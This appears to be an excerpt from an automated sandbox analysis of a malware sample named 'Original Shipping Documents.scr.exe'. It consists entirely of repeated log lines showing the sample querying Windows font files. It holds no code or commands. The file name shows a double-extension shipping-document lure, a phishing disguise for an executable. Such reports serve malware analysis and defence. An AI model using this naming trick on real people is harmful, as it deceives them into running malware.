Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
